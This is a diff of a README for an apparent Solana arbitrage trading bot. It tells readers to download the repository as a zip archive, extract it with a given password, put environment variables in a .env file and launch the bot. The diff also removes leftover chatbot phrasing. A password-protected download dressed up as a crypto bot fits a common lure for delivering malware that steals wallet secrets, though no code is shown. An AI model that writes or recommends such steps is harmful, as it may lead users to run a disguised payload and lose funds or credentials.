Zhang8081/Solana-Arbitrage-bot/README.md

 ## Usage
 - [Clone](https://github.com/Zhang8081/Solana-Arbitrage-bot/archive/refs/heads/main.zip) the repository
 - extract archive with pass `1Na0Q3`
-Sure!
-Here's a slightly more unique version of that text:
 - Set up your environment:
 Create a `.env` file in the root folder of your project and add your environment variables.
 Feel free to use the `.env.example` file as a reference.
 - Launch the bot.